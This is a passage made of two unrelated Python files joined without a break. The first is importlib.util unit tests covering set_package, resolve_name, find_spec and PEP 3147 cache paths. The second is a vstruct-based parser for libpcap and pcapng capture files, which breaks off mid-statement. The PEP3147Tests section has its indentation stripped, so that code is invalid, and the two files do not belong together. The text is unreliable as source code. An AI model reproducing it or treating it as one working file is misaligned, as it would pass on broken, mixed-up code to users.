            def __bool__(self): return False
        name = 'mod'
        module = FalseModule(name)
        with util.uncache(name):
            self.assertFalse(module)
            sys.modules[name] = module
            given = self.return_module(name)
            self.assertIs(given, module)
    def test_attributes_set(self):
        # __name__, __loader__, and __package__ should be set (when
        # is_package() is defined; undefined implicitly tested elsewhere).
        class FakeLoader:
            def __init__(self, is_package):
                self._pkg = is_package
            def is_package(self, name):
                return self._pkg
            @self.module_for_loader
            def load_module(self, module):
                return module
        name = 'pkg.mod'
        with util.uncache(name):
            loader = FakeLoader(False)
            module = loader.load_module(name)
            self.assertEqual(module.__name__, name)
            self.assertIs(module.__loader__, loader)
            self.assertEqual(module.__package__, 'pkg')
        name = 'pkg.sub'
        with util.uncache(name):
            loader = FakeLoader(True)
            module = loader.load_module(name)
            self.assertEqual(module.__name__, name)
            self.assertIs(module.__loader__, loader)
            self.assertEqual(module.__package__, name)
(Frozen_ModuleForLoaderTests,
 Source_ModuleForLoaderTests
 ) = util.test_both(ModuleForLoaderTests, util=importlib_util)
class SetPackageTests:
    """Tests for importlib.util.set_package."""
    def verify(self, module, expect):
        """Verify the module has the expected value for __package__ after
        passing through set_package."""
        fxn = lambda: module
        wrapped = self.util.set_package(fxn)
        with warnings.catch_warnings():
            warnings.simplefilter('ignore', DeprecationWarning)
            wrapped()
        self.assertTrue(hasattr(module, '__package__'))
        self.assertEqual(expect, module.__package__)
    def test_top_level(self):
        # __package__ should be set to the empty string if a top-level module.
        # Implicitly tests when package is set to None.
        module = types.ModuleType('module')
        module.__package__ = None
        self.verify(module, '')
    def test_package(self):
        # Test setting __package__ for a package.
        module = types.ModuleType('pkg')
        # The presence of __path__ is what marks a module as a package.
        module.__path__ = ['<path>']
        module.__package__ = None
        self.verify(module, 'pkg')
    def test_submodule(self):
        # Test __package__ for a module in a package.
        module = types.ModuleType('pkg.mod')
        module.__package__ = None
        self.verify(module, 'pkg')
    def test_setting_if_missing(self):
        # __package__ should be set if it is missing.
        module = types.ModuleType('mod')
        if hasattr(module, '__package__'):
            delattr(module, '__package__')
        self.verify(module, '')
    def test_leaving_alone(self):
        # If __package__ is set and not None then leave it alone.
        for value in (True, False):
            module = types.ModuleType('mod')
            module.__package__ = value
            self.verify(module, value)
    def test_decorator_attrs(self):
        # The decorator must preserve the wrapped function's metadata.
        def fxn(module): pass
        with warnings.catch_warnings():
            warnings.simplefilter('ignore', DeprecationWarning)
            wrapped = self.util.set_package(fxn)
        self.assertEqual(wrapped.__name__, fxn.__name__)
        self.assertEqual(wrapped.__qualname__, fxn.__qualname__)
(Frozen_SetPackageTests,
 Source_SetPackageTests
 ) = util.test_both(SetPackageTests, util=importlib_util)
class SetLoaderTests:
    """Tests importlib.util.set_loader()."""
    @property
    def DummyLoader(self):
        # Set DummyLoader on the class lazily.
        # (Deferred because self.util is only bound once util.test_both has
        # injected the importlib variant under test.)
        class DummyLoader:
            @self.util.set_loader
            def load_module(self, module):
                return self.module
        self.__class__.DummyLoader = DummyLoader
        return DummyLoader
    def test_no_attribute(self):
        # Missing __loader__ gets filled in with the loader.
        loader = self.DummyLoader()
        loader.module = types.ModuleType('blah')
        try:
            del loader.module.__loader__
        except AttributeError:
            pass
        with warnings.catch_warnings():
            warnings.simplefilter('ignore', DeprecationWarning)
            self.assertEqual(loader, loader.load_module('blah').__loader__)
    def test_attribute_is_None(self):
        # A __loader__ of None is treated as unset and overwritten.
        loader = self.DummyLoader()
        loader.module = types.ModuleType('blah')
        loader.module.__loader__ = None
        with warnings.catch_warnings():
            warnings.simplefilter('ignore', DeprecationWarning)
            self.assertEqual(loader, loader.load_module('blah').__loader__)
    def test_not_reset(self):
        # An already-set, non-None __loader__ must be left alone.
        loader = self.DummyLoader()
        loader.module = types.ModuleType('blah')
        loader.module.__loader__ = 42
        with warnings.catch_warnings():
            warnings.simplefilter('ignore', DeprecationWarning)
            self.assertEqual(42, loader.load_module('blah').__loader__)
(Frozen_SetLoaderTests,
 Source_SetLoaderTests
 ) = util.test_both(SetLoaderTests, util=importlib_util)
class ResolveNameTests:
    """Tests importlib.util.resolve_name()."""
    def test_absolute(self):
        # An absolute name with no package context comes back untouched.
        resolved = self.util.resolve_name('bacon', None)
        self.assertEqual(resolved, 'bacon')
    def test_aboslute_within_package(self):
        # An absolute name ignores the surrounding package.
        resolved = self.util.resolve_name('bacon', 'spam')
        self.assertEqual(resolved, 'bacon')
    def test_no_package(self):
        # A relative name with an empty package context is an error.
        with self.assertRaises(ValueError):
            self.util.resolve_name('.bacon', '')
    def test_in_package(self):
        # One leading dot resolves against the given package.
        resolved = self.util.resolve_name('.bacon', 'spam.eggs')
        self.assertEqual(resolved, 'spam.eggs.bacon')
    def test_other_package(self):
        # Two leading dots step up one package level first.
        resolved = self.util.resolve_name('..bacon', 'spam.eggs')
        self.assertEqual(resolved, 'spam.bacon')
    def test_escape(self):
        # Climbing above the top-level package is an error.
        with self.assertRaises(ValueError):
            self.util.resolve_name('..bacon', 'spam')
(Frozen_ResolveNameTests,
 Source_ResolveNameTests
 ) = util.test_both(ResolveNameTests, util=importlib_util)
class FindSpecTests:
    """Tests for importlib.util.find_spec()."""
    class FakeMetaFinder:
        # Echoes its arguments so tests can assert what find_spec() passed.
        @staticmethod
        def find_spec(name, path=None, target=None): return name, path, target
    def test_sys_modules(self):
        # An already-imported module's __spec__ is returned directly.
        name = 'some_mod'
        with util.uncache(name):
            module = types.ModuleType(name)
            loader = 'a loader!'
            spec = self.machinery.ModuleSpec(name, loader)
            module.__loader__ = loader
            module.__spec__ = spec
            sys.modules[name] = module
            found = self.util.find_spec(name)
            self.assertEqual(found, spec)
    def test_sys_modules_without___loader__(self):
        # A missing __loader__ does not prevent using __spec__.
        name = 'some_mod'
        with util.uncache(name):
            module = types.ModuleType(name)
            del module.__loader__
            loader = 'a loader!'
            spec = self.machinery.ModuleSpec(name, loader)
            module.__spec__ = spec
            sys.modules[name] = module
            found = self.util.find_spec(name)
            self.assertEqual(found, spec)
    def test_sys_modules_spec_is_None(self):
        # __spec__ of None on a cached module is an error.
        name = 'some_mod'
        with util.uncache(name):
            module = types.ModuleType(name)
            module.__spec__ = None
            sys.modules[name] = module
            with self.assertRaises(ValueError):
                self.util.find_spec(name)
    def test_sys_modules_loader_is_None(self):
        # A spec with a None loader is still a valid spec.
        name = 'some_mod'
        with util.uncache(name):
            module = types.ModuleType(name)
            spec = self.machinery.ModuleSpec(name, None)
            module.__spec__ = spec
            sys.modules[name] = module
            found = self.util.find_spec(name)
            self.assertEqual(found, spec)
    def test_sys_modules_spec_is_not_set(self):
        # A cached module with no __spec__ at all is an error.
        name = 'some_mod'
        with util.uncache(name):
            module = types.ModuleType(name)
            try:
                del module.__spec__
            except AttributeError:
                pass
            sys.modules[name] = module
            with self.assertRaises(ValueError):
                self.util.find_spec(name)
    def test_success(self):
        # With a meta-path finder installed, its result is passed through.
        name = 'some_mod'
        with util.uncache(name):
            with util.import_state(meta_path=[self.FakeMetaFinder]):
                self.assertEqual((name, None, None),
                                 self.util.find_spec(name))
    def test_nothing(self):
        # None is returned upon failure to find a loader.
        self.assertIsNone(self.util.find_spec('nevergoingtofindthismodule'))
    def test_find_submodule(self):
        # Finding a submodule imports the parent but NOT the submodule.
        name = 'spam'
        subname = 'ham'
        with util.temp_module(name, pkg=True) as pkg_dir:
            fullname, _ = util.submodule(name, subname, pkg_dir)
            spec = self.util.find_spec(fullname)
            self.assertIsNot(spec, None)
            self.assertIn(name, sorted(sys.modules))
            self.assertNotIn(fullname, sorted(sys.modules))
            # Ensure successive calls behave the same.
            spec_again = self.util.find_spec(fullname)
            self.assertEqual(spec_again, spec)
    def test_find_submodule_parent_already_imported(self):
        # Same as above, but with the parent imported beforehand.
        name = 'spam'
        subname = 'ham'
        with util.temp_module(name, pkg=True) as pkg_dir:
            self.init.import_module(name)
            fullname, _ = util.submodule(name, subname, pkg_dir)
            spec = self.util.find_spec(fullname)
            self.assertIsNot(spec, None)
            self.assertIn(name, sorted(sys.modules))
            self.assertNotIn(fullname, sorted(sys.modules))
            # Ensure successive calls behave the same.
            spec_again = self.util.find_spec(fullname)
            self.assertEqual(spec_again, spec)
    def test_find_relative_module(self):
        # A relative name plus a package argument is resolved first.
        name = 'spam'
        subname = 'ham'
        with util.temp_module(name, pkg=True) as pkg_dir:
            fullname, _ = util.submodule(name, subname, pkg_dir)
            relname = '.' + subname
            spec = self.util.find_spec(relname, name)
            self.assertIsNot(spec, None)
            self.assertIn(name, sorted(sys.modules))
            self.assertNotIn(fullname, sorted(sys.modules))
            # Ensure successive calls behave the same.
            spec_again = self.util.find_spec(fullname)
            self.assertEqual(spec_again, spec)
    def test_find_relative_module_missing_package(self):
        # A relative name without a package argument is an error and must
        # not leave anything cached in sys.modules.
        name = 'spam'
        subname = 'ham'
        with util.temp_module(name, pkg=True) as pkg_dir:
            fullname, _ = util.submodule(name, subname, pkg_dir)
            relname = '.' + subname
            with self.assertRaises(ValueError):
                self.util.find_spec(relname)
            self.assertNotIn(name, sorted(sys.modules))
            self.assertNotIn(fullname, sorted(sys.modules))
(Frozen_FindSpecTests,
 Source_FindSpecTests
 ) = util.test_both(FindSpecTests, init=init, util=importlib_util,
                    machinery=machinery)
class MagicNumberTests:
    """Sanity checks on importlib.util.MAGIC_NUMBER."""
    def test_length(self):
        # The bytecode magic number is defined to be exactly four bytes.
        magic = self.util.MAGIC_NUMBER
        self.assertEqual(4, len(magic))
    def test_incorporates_rn(self):
        # The magic number deliberately ends in \r\n so that accidental
        # line-ending translation corrupts it detectably.
        self.assertTrue(self.util.MAGIC_NUMBER.endswith(b'\r\n'))
(Frozen_MagicNumberTests,
 Source_MagicNumberTests
 ) = util.test_both(MagicNumberTests, util=importlib_util)
class PEP3147Tests:
"""Tests of PEP 3147-related functions: cache_from_source and source_from_cache."""
tag = sys.implementation.cache_tag
@unittest.skipUnless(sys.implementation.cache_tag is not None,
'requires sys.implementation.cache_tag not be None')
def test_cache_from_source(self):
# Given the path to a .py file, return the path to its PEP 3147
# defined .pyc file (i.e. under __pycache__).
path = os.path.join('foo', 'bar', 'baz', 'qux.py')
expect = os.path.join('foo', 'bar', 'baz', '__pycache__',
'qux.{}.pyc'.format(self.tag))
self.assertEqual(self.util.cache_from_source(path, optimization=''),
expect)
def test_cache_from_source_no_cache_tag(self):
# No cache tag means NotImplementedError.
with support.swap_attr(sys.implementation, 'cache_tag', None):
with self.assertRaises(NotImplementedError):
self.util.cache_from_source('whatever.py')
def test_cache_from_source_no_dot(self):
# Directory with a dot, filename without dot.
path = os.path.join('foo.bar', 'file')
expect = os.path.join('foo.bar', '__pycache__',
'file{}.pyc'.format(self.tag))
self.assertEqual(self.util.cache_from_source(path, optimization=''),
expect)
def test_cache_from_source_debug_override(self):
# Given the path to a .py file, return the path to its PEP 3147/PEP 488
# defined .pyc file (i.e. under __pycache__).
path = os.path.join('foo', 'bar', 'baz', 'qux.py')
with warnings.catch_warnings():
warnings.simplefilter('ignore')
self.assertEqual(self.util.cache_from_source(path, False),
self.util.cache_from_source(path, optimization=1))
self.assertEqual(self.util.cache_from_source(path, True),
self.util.cache_from_source(path, optimization=''))
with warnings.catch_warnings():
warnings.simplefilter('error')
with self.assertRaises(DeprecationWarning):
self.util.cache_from_source(path, False)
with self.assertRaises(DeprecationWarning):
self.util.cache_from_source(path, True)
def test_cache_from_source_cwd(self):
path = 'foo.py'
expect = os.path.join('__pycache__', 'foo.{}.pyc'.format(self.tag))
self.assertEqual(self.util.cache_from_source(path, optimization=''),
expect)
def test_cache_from_source_override(self):
# When debug_override is not None, it can be any true-ish or false-ish
# value.
path = os.path.join('foo', 'bar', 'baz.py')
# However if the bool-ishness can't be determined, the exception
# propagates.
class Bearish:
def __bool__(self): raise RuntimeError
with warnings.catch_warnings():
warnings.simplefilter('ignore')
self.assertEqual(self.util.cache_from_source(path, []),
self.util.cache_from_source(path, optimization=1))
self.assertEqual(self.util.cache_from_source(path, [17]),
self.util.cache_from_source(path, optimization=''))
with self.assertRaises(RuntimeError):
self.util.cache_from_source('/foo/bar/baz.py', Bearish())
def test_cache_from_source_optimization_empty_string(self):
# Setting 'optimization' to '' leads to no optimization tag (PEP 488).
path = 'foo.py'
expect = os.path.join('__pycache__', 'foo.{}.pyc'.format(self.tag))
self.assertEqual(self.util.cache_from_source(path, optimization=''),
expect)
def test_cache_from_source_optimization_None(self):
# Setting 'optimization' to None uses the interpreter's optimization.
# (PEP 488)
path = 'foo.py'
optimization_level = sys.flags.optimize
almost_expect = os.path.join('__pycache__', 'foo.{}'.format(self.tag))
if optimization_level == 0:
expect = almost_expect + '.pyc'
elif optimization_level <= 2:
expect = almost_expect + '.opt-{}.pyc'.format(optimization_level)
else:
msg = '{!r} is a non-standard optimization level'.format(optimization_level)
self.skipTest(msg)
self.assertEqual(self.util.cache_from_source(path, optimization=None),
expect)
def test_cache_from_source_optimization_set(self):
# The 'optimization' parameter accepts anything that has a string repr
# that passes str.alnum().
path = 'foo.py'
valid_characters = string.ascii_letters + string.digits
almost_expect = os.path.join('__pycache__', 'foo.{}'.format(self.tag))
got = self.util.cache_from_source(path, optimization=valid_characters)
# Test all valid characters are accepted.
self.assertEqual(got,
almost_expect + '.opt-{}.pyc'.format(valid_characters))
# str() should be called on argument.
self.assertEqual(self.util.cache_from_source(path, optimization=42),
almost_expect + '.opt-42.pyc')
# Invalid characters raise ValueError.
with self.assertRaises(ValueError):
self.util.cache_from_source(path, optimization='path/is/bad')
def test_cache_from_source_debug_override_optimization_both_set(self):
# Can only set one of the optimization-related parameters.
with warnings.catch_warnings():
warnings.simplefilter('ignore')
with self.assertRaises(TypeError):
self.util.cache_from_source('foo.py', False, optimization='')
@unittest.skipUnless(os.sep == '\\' and os.altsep == '/',
'test meaningful only where os.altsep is defined')
def test_sep_altsep_and_sep_cache_from_source(self):
# Windows path and PEP 3147 where sep is right of altsep.
self.assertEqual(
self.util.cache_from_source('\\foo\\bar\\baz/qux.py', optimization=''),
'\\foo\\bar\\baz\\__pycache__\\qux.{}.pyc'.format(self.tag))
@unittest.skipUnless(sys.implementation.cache_tag is not None,
'requires sys.implementation.cache_tag to not be '
'None')
def test_source_from_cache(self):
# Given the path to a PEP 3147 defined .pyc file, return the path to
# its source. This tests the good path.
path = os.path.join('foo', 'bar', 'baz', '__pycache__',
'qux.{}.pyc'.format(self.tag))
expect = os.path.join('foo', 'bar', 'baz', 'qux.py')
self.assertEqual(self.util.source_from_cache(path), expect)
def test_source_from_cache_no_cache_tag(self):
    # Raises NotImplementedError while sys.implementation.cache_tag
    # is (temporarily) None.
    pyc = os.path.join('blah', '__pycache__', 'whatever.pyc')
    with support.swap_attr(sys.implementation, 'cache_tag', None):
        self.assertRaises(NotImplementedError,
                          self.util.source_from_cache, pyc)
def test_source_from_cache_bad_path(self):
    # A pyc path that is not laid out per PEP 3147 is rejected.
    with self.assertRaises(ValueError):
        self.util.source_from_cache('/foo/bar/bazqux.pyc')
def test_source_from_cache_no_slash(self):
    # A bare filename with no directory separator is rejected.
    with self.assertRaises(ValueError):
        self.util.source_from_cache('foo.cpython-32.pyc')
def test_source_from_cache_too_few_dots(self):
    # The final path component needs at least two dots.
    with self.assertRaises(ValueError):
        self.util.source_from_cache('__pycache__/foo.pyc')
def test_source_from_cache_too_many_dots(self):
    # More dotted components than name.tag.opt-N is rejected.
    self.assertRaises(ValueError, self.util.source_from_cache,
                      '__pycache__/foo.cpython-32.opt-1.foo.pyc')
def test_source_from_cache_not_opt(self):
    # An optional filename component that is not 'opt-*' is rejected.
    with self.assertRaises(ValueError):
        self.util.source_from_cache('__pycache__/foo.cpython-32.foo.pyc')
def test_source_from_cache_no__pycache__(self):
    # The parent directory must literally be named __pycache__.
    with self.assertRaises(ValueError):
        self.util.source_from_cache('/foo/bar/foo.cpython-32.foo.pyc')
def test_source_from_cache_optimized_bytecode(self):
    # An opt- tag in the pyc name does not change the source mapping.
    pyc = os.path.join('__pycache__', 'foo.{}.opt-1.pyc'.format(self.tag))
    self.assertEqual(self.util.source_from_cache(pyc), 'foo.py')
def test_source_from_cache_missing_optimization(self):
    # An 'opt-' tag with nothing after the dash is rejected.
    pyc = os.path.join('__pycache__', 'foo.{}.opt-.pyc'.format(self.tag))
    self.assertRaises(ValueError, self.util.source_from_cache, pyc)
# Generate the frozen- and source-importlib flavors of the test case.
(Frozen_PEP3147Tests,
 Source_PEP3147Tests
 ) = util.test_both(PEP3147Tests, util=importlib_util)

if __name__ == '__main__':
    unittest.main()
import struct

import vstruct
import vstruct.defs.inet as vs_inet
from vstruct.primitives import *
# libpcap (classic tcpdump) link-layer types supported by this parser
PCAP_LINKTYPE_ETHER = 1
PCAP_LINKTYPE_RAW = 101

# pcapng byte-order magic; only parses to this value when read with the
# endianness the file was written in (see PCAPNG_SECTION_HEADER_BLOCK.pcb_bom)
PCAPNG_BOM = 0x1A2B3C4D

# option codes shared by all pcapng block types
OPT_ENDOFOPT = 0
OPT_COMMENT = 1
#PCAPNG_BLOCKTYPE_SECTION_HEADER options
OPT_SHB_HARDWARE = 2
OPT_SHB_OS = 3
OPT_SHB_USERAPPL = 4
#PCAPNG_INTERFACE_DESCRIPTION_BLOCK options
OPT_IF_NAME = 2
OPT_IF_DESCRIPTION = 3
OPT_IF_IPV4ADDR = 4
OPT_IF_IPV6ADDR = 5
OPT_IF_MACADDR = 6
OPT_IF_EUIADDR = 7
OPT_IF_SPEED = 8
OPT_IF_TSRESOL = 9
OPT_IF_TZONE = 10
OPT_IF_FILTER = 11
OPT_IF_OS = 12
OPT_IF_FCSLEN = 13
OPT_IF_TSOFFSET = 14
# options for PCAPNG_ENHANCED_PACKET_BLOCK
OPT_EPB_FLAGS = 2
OPT_EPB_HASH = 3
OPT_EPB_DROPCOUNT = 4
# values used in the blocktype field
PCAPNG_BLOCKTYPE_INTERFACE_DESCRIPTION = 0x00000001
PCAPNG_BLOCKTYPE_PACKET = 0x00000002
PCAPNG_BLOCKTYPE_SIMPLE_PACKET = 0x00000003
PCAPNG_BLOCKTYPE_NAME_RESOLUTION = 0x00000004
PCAPNG_BLOCKTYPE_INTERFACE_STATS = 0x00000005
PCAPNG_BLOCKTYPE_ENHANCED_PACKET = 0x00000006
PCAPNG_BLOCKTYPE_SECTION_HEADER = 0x0a0d0d0a
def pad4bytes(size):
    '''
    Round size up to the next multiple of 4; pcapng option payloads and
    packet data are padded to 32-bit boundaries.
    '''
    remainder = size % 4
    if remainder:
        return size + (4 - remainder)
    return size
class PCAP_FILE_HEADER(vstruct.VStruct):
    # Global header at the start of a classic libpcap capture file.
    # Field definition order determines parse order; do not reorder.
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.magic = v_uint32()     # file magic / byte-order marker
        self.vers_maj = v_uint16()
        self.vers_min = v_uint16()
        self.thiszone = v_uint32()  # GMT-to-local correction
        self.sigfigs = v_uint32()
        self.snaplen = v_uint32()   # max bytes captured per packet
        self.linktype = v_uint32()  # see PCAP_LINKTYPE_* constants
class PCAP_PACKET_HEADER(vstruct.VStruct):
    # Per-packet record header in a classic libpcap file.
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.tvsec = v_uint32()   # timestamp, seconds
        self.tvusec = v_uint32()  # timestamp, sub-second part
        self.caplen = v_uint32()  # bytes actually stored in the file
        self.len = v_uint32()     # original length on the wire
class PCAPNG_GENERIC_BLOCK_HEADER(vstruct.VStruct):
    '''
    Used to read the block type & size when parsing the file
    '''
    def __init__(self, bigend=False):
        vstruct.VStruct.__init__(self)
        self.blocktype = v_uint32(bigend=bigend)  # PCAPNG_BLOCKTYPE_* value
        self.blocksize = v_uint32(bigend=bigend)  # total block length in bytes
class PCAPNG_BLOCK_PARENT(vstruct.VStruct):
    '''
    Used to inherit the weird parsing style where there's variable length
    options at the end, followed by the duplicate block total length
    '''
    def __init__(self, bigend=False):
        vstruct.VStruct.__init__(self)
        # Non-vstruct field.  Bug fix: previously hard-coded to False,
        # which silently ignored the endianness the caller had already
        # detected and mis-parsed option lists in big-endian captures.
        # PCAPNG_SECTION_HEADER_BLOCK still overwrites this in pcb_bom()
        # once the byte-order magic has been examined.
        self.bigend = bigend
    def vsParse(self, bytez, offset=0):
        '''
        Parse the fixed fields, then consume PCAPNG_OPTION entries until
        OPT_ENDOFOPT (or the option area is exhausted), and finally read
        the trailing duplicate block length.  Returns the 4-byte-aligned
        offset just past this block.
        '''
        startoff = offset
        roff = vstruct.VStruct.vsParse(self, bytez, offset=offset)
        #(blocksize-4): because we still need the trailing blocksize2
        # apparently blocks can completely omit the options list and not
        # even have the OPT_ENDOFOPT entry
        while (roff < len(bytez)) and ((roff-startoff) < (self.blocksize-4)):
            opt = PCAPNG_OPTION(bigend=self.bigend)
            roff = opt.vsParse(bytez, roff)
            if opt.code == OPT_ENDOFOPT:
                break
            self.options.vsAddElement(opt)
        # append trailing blocksize2
        bs2 = v_uint32(bigend=self.bigend)
        self.vsAddField('blocksize2', bs2)
        roff = bs2.vsParse(bytez, roff)
        #pad, plus we skip
        return pad4bytes(roff)
class PCAPNG_SECTION_HEADER_BLOCK(PCAPNG_BLOCK_PARENT):
    # Section Header Block (blocktype 0x0a0d0d0a); opens a pcapng section
    # and carries the byte-order magic used to detect file endianness.
    def __init__(self, bigend=False):
        PCAPNG_BLOCK_PARENT.__init__(self, bigend)
        self.blocktype = v_uint32(bigend=bigend)
        self.blocksize = v_uint32(bigend=bigend)
        self.bom = v_uint32(bigend=bigend)        # byte-order magic (PCAPNG_BOM)
        self.vers_maj = v_uint16(bigend=bigend)
        self.vers_min = v_uint16(bigend=bigend)
        self.sectionsize = v_uint64(bigend=bigend)
        self.options = vstruct.VArray([])
        #blocksize2: dynamically added in vsParse()
        #self.blocksize2 = v_uint32(bigend=bigend)
    def pcb_bom(self):
        # Parse callback fired once 'bom' has been read: if it equals the
        # expected magic, the endianness we parsed with is correct;
        # otherwise the file uses the opposite byte order.
        bom = self.vsGetField('bom')
        if self.bom == PCAPNG_BOM:
            #if it matches, then the endian of bom is correct
            self.bigend = bom._vs_bigend
        else:
            self.bigend = not bom._vs_bigend
class PCAPNG_OPTION(vstruct.VStruct):
    # A single (code, length, value) option entry inside a pcapng block.
    def __init__(self, bigend=False):
        vstruct.VStruct.__init__(self)
        self.code = v_uint16(bigend=bigend)     # OPT_* constant
        self.optsize = v_uint16(bigend=bigend)  # unpadded payload length
        self.bytes = v_bytes(0)
    def pcb_optsize(self):
        # Parse callback: payloads are stored padded to 32-bit alignment,
        # so size the value buffer to the padded length.
        size = pad4bytes(self.optsize)
        self.vsGetField('bytes').vsSetLength(size)
class PCAPNG_INTERFACE_DESCRIPTION_BLOCK(PCAPNG_BLOCK_PARENT):
    # Interface Description Block: declares one capture interface and
    # (via options) the timestamp resolution/offset of its packets.
    def __init__(self, bigend=False):
        PCAPNG_BLOCK_PARENT.__init__(self, bigend)
        self.blocktype = v_uint32(bigend=bigend)
        self.blocksize = v_uint32(bigend=bigend)
        self.linktype = v_uint16(bigend=bigend)
        self.reserved = v_uint16(bigend=bigend)
        self.snaplen = v_uint32(bigend=bigend)
        self.options = vstruct.VArray([])
        #blocksize2: dynamically added in vsParse()
        #self.blocksize2 = v_uint32(bigend=bigend)
    def vsParse(self, bytez, offset=0):
        '''
        We need the tsresol value to adjust timestamp values, so pull it
        out of the option list here after the generic parse.
        '''
        # Bug fix: honor the caller-supplied offset instead of always
        # re-parsing from offset 0.
        ret = PCAPNG_BLOCK_PARENT.vsParse(self, bytez, offset=offset)
        self.tsresol = None
        # default timestamp offset is 0 seconds
        self.tsoffset = 0
        for i, opt in self.options:
            if opt.code == OPT_IF_TSRESOL:
                # resolution spec is the first payload byte
                self.tsresol = ord(opt.bytes[0])
            elif opt.code == OPT_IF_TSOFFSET:
                # 64-bit seconds offset, endianness per the section header
                fmt = '<Q'
                if self.bigend:
                    fmt = '>Q'
                self.tsoffset = struct.unpack_from(fmt, opt.bytes)[0]
        return ret
class PCAPNG_ENHANCED_PACKET_BLOCK(PCAPNG_BLOCK_PARENT):
    # Enhanced Packet Block: one captured packet plus a 64-bit timestamp
    # split across two 32-bit fields.
    def __init__(self, bigend=False):
        PCAPNG_BLOCK_PARENT.__init__(self, bigend)
        self.blocktype = v_uint32(bigend=bigend)
        self.blocksize = v_uint32(bigend=bigend)
        self.interfaceid = v_uint32(bigend=bigend)
        self.tstamphi = v_uint32(bigend=bigend)
        self.tstamplow = v_uint32(bigend=bigend)
        self.caplen = v_uint32(bigend=bigend)
        self.packetlen = v_uint32(bigend=bigend)
        self.data = v_bytes(0)
        self.options = vstruct.VArray([])
        #blocksize2: dynamically added in vsParse()
        #self.blocksize2 = v_uint32(bigend=bigend)
    def pcb_caplen(self):
        # Parse callback: packet data is padded to 32-bit alignment.
        size = pad4bytes(self.caplen)
        self.vsGetField('data').vsSetLength(size)
    def setPcapTimestamp(self, idb):
        '''
        Adds a libpcap compatible tvsec and tvusec fields, based on the
        pcapng timestamp and the interface's declared resolution.
        '''
        self.snaplen = idb.snaplen
        tstamp = (self.tstamphi << 32) | self.tstamplow
        scale = 1000000
        if idb.tsresol is None:
            # interface did not specify: default 10**-6 resolution
            pass
        elif (0x80 & idb.tsresol) == 0:
            # remaining bits are resolution, to a negative power of 10
            scale = 10**(idb.tsresol & 0x7f)
        else:
            # remaining bits are resolution, to a negative power of 2
            scale = 1 << (idb.tsresol & 0x7f)
        # Bug fix: use floor division so tvsec stays an integer under
        # Python 3 (true division would produce a float there; Python 2
        # int division already floored).
        self.tvsec = (tstamp // scale) + idb.tsoffset
        self.tvusec = tstamp % scale
class PCAPNG_SIMPLE_PACKET_BLOCK(vstruct.VStruct):
    '''
    Note: no variable length options fields, so inheriting from vstruct directly
    '''
    def __init__(self, bigend=False):
        vstruct.VStruct.__init__(self)
        self.blocktype = v_uint32(bigend=bigend)
        self.blocksize = v_uint32(bigend=bigend)
        self.packetlen = v_uint32(bigend=bigend)
        self.data = v_bytes(0)
        self.blocksize2 = v_uint32(bigend=bigend)
    def pcb_blocksize(self):
        # Parse callback: data length is the whole block minus the four
        # fixed uint32 fields (blocktype, blocksize, packetlen,
        # blocksize2 = 16 bytes), already 4-byte padded.
        self.caplen = pad4bytes(self.blocksize - 16)
        self.vsGetField('data').vsSetLength(self.caplen)
    def setPcapTimestamp(self, idb):
        #no timestamp in this type of block :(
        self.tvsec = idb.tsoffset
        self.tvusec = 0
def iterPcapFileName(filename, reuse=False):
    '''
    Convenience wrapper: open the named capture file and iterate its
    packet tuples (see iterPcapFile).
    '''
    # Bug fix: the file() builtin only exists on Python 2; open() is
    # equivalent on both Python 2 and 3.
    fd = open(filename, 'rb')
    for x in iterPcapFile(fd, reuse=reuse):
        yield x
def iterPcapFile(fd, reuse=False):
    '''
    Sniff whether fd contains a classic tcpdump capture or a pcapng
    capture, then dispatch to the matching iterator.
    '''
    hdr = PCAP_FILE_HEADER()
    raw = fd.read(len(hdr))
    hdr.vsParse(raw, fast=True)
    # rewind so the chosen iterator re-reads from the start
    fd.seek(0)
    if hdr.magic == PCAPNG_BLOCKTYPE_SECTION_HEADER:
        return _iterPcapNgFile(fd, reuse)
    return _iterPcapFile(fd, reuse)
def _iterPcapFile(fd, reuse=False):
    # Yield (pkt_header, ipv4, transport_header, payload_bytes) tuples
    # from a classic libpcap file object.  With reuse=True the same
    # vstruct instances are re-parsed for every packet (less allocation,
    # but each yielded struct is only valid until the next iteration).
    h = PCAP_FILE_HEADER()
    b = fd.read(len(h))
    h.vsParse(b, fast=True)
    linktype = h.linktype
    if linktype not in (PCAP_LINKTYPE_ETHER, PCAP_LINKTYPE_RAW):
        raise Exception('PCAP Link Type %d Not Supported Yet!' % linktype)
    pkt = PCAP_PACKET_HEADER()
    eII = vs_inet.ETHERII()
    pktsize = len(pkt)
    eIIsize = len(eII)
    ipv4 = vs_inet.IPv4()
    ipv4size = 20
    tcp_hdr = vs_inet.TCP()
    udp_hdr = vs_inet.UDP()
    icmp_hdr = vs_inet.ICMP()
    go = True
    while go:
        hdr = fd.read(pktsize)
        if len(hdr) != pktsize:
            # short read: end of file (or truncated capture)
            break
        pkt.vsParse(hdr, fast=True)
        b = fd.read(pkt.caplen)
        offset = 0
        if linktype == PCAP_LINKTYPE_ETHER:
            if len(b) < eIIsize:
                continue
            eII.vsParse(b, 0, fast=True)
            # No support for non-ip protocol yet...
            if eII.etype not in (vs_inet.ETH_P_IP,vs_inet.ETH_P_VLAN):
                continue
            offset += eIIsize
            if eII.etype == vs_inet.ETH_P_VLAN:
                # skip the 4-byte 802.1Q VLAN tag
                offset += 4
        elif linktype == PCAP_LINKTYPE_RAW:
            # raw IP: datagram starts at offset 0
            pass
        #print eII.tree()
        if not reuse:
            ipv4 = vs_inet.IPv4()
        if (len(b) - offset) < ipv4size:
            continue
        ipv4.vsParse(b, offset, fast=True)
        # Make b *only* the IP datagram bytes...
        b = b[offset:offset+ipv4.totlen]
        offset = 0
        offset += len(ipv4)
        tsize = len(b) - offset
        if ipv4.proto == vs_inet.IPPROTO_TCP:
            if tsize < 20:
                # too short to hold a TCP header
                continue
            if not reuse:
                tcp_hdr = vs_inet.TCP()
            tcp_hdr.vsParse(b, offset, fast=True)
            offset += len(tcp_hdr)
            pdata = b[offset:]
            yield pkt,ipv4,tcp_hdr,pdata
        elif ipv4.proto == vs_inet.IPPROTO_UDP:
            if tsize < 8:
                # too short to hold a UDP header
                continue
            if not reuse:
                udp_hdr = vs_inet.UDP()
            udp_hdr.vsParse(b, offset, fast=True)
            offset += len(udp_hdr)
            pdata = b[offset:]
            yield pkt,ipv4,udp_hdr,pdata
        elif ipv4.proto == vs_inet.IPPROTO_ICMP:
            if tsize < 4:
                # too short to hold an ICMP header
                continue
            if not reuse:
